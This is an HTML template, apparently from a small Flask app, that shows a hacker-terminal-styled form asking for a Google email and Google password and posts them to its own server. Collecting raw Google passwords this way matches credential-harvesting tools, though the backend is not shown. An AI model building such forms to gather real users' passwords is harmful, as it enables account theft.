{% extends "layout.html" %}
{%block body%}

    <p style="color:red;text-align: center;">[!] Please make sure that you're entering Google EMAIL</p>
    <div class="commandLine">
        <form method="POST">
            <hr style="color:white">
            <p style="margin:0;color:blue;text-align: center;">~Enter Your Google Email~</p>
            <p style="display:inline;color:yellow">#></p>
            <input class="in" id="email" name="email">
            <hr style="color:white">
            <p style="margin:0;color:blue;text-align: center;">~Enter Your Google Password~</p>
            <p style="display:inline;color:yellow">#></p>
            <input class="in" id="password" name="password" type="password">
            <hr style="color:white">

            <br><br>
            <input type="submit" value="Continue" style="font-family: 'VT323', monospace;font-size:24px;padding:12px;width:100%;color:white;background-color:black;border:1px solid white;border-radius:5px;">

        </form>
        
    </div>
    <br><br>    
{%endblock%}